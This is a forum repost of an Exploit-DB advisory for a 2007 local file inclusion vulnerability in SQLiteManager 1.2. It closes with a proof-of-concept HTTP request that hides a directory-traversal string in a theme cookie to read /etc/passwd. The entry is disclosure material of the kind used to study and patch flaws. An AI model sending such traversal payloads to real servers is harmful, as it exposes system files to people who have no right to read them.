- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29665
- Проверка EDB
-
- Пройдено
- Автор
- SIMON BONNARD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-1232
- Дата публикации
- 2007-02-26
SQLiteManager 1.2 - Local File Inclusion
Код:
source: https://www.securityfocus.com/bid/22727/info
SQLiteManager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
SQLiteManager 1.2.0 is vulnerable to this issue; other versions may also be affected.
GET /home/sqlite/ HTTP/1.0
[...]
Cookie: PHPSESSID=[...];SQLiteManager_currentTheme=../../../../../../../../../../../../../etc/passwd%00;
SQLiteManager_currentLangue=deleted- Источник
- www.exploit-db.com
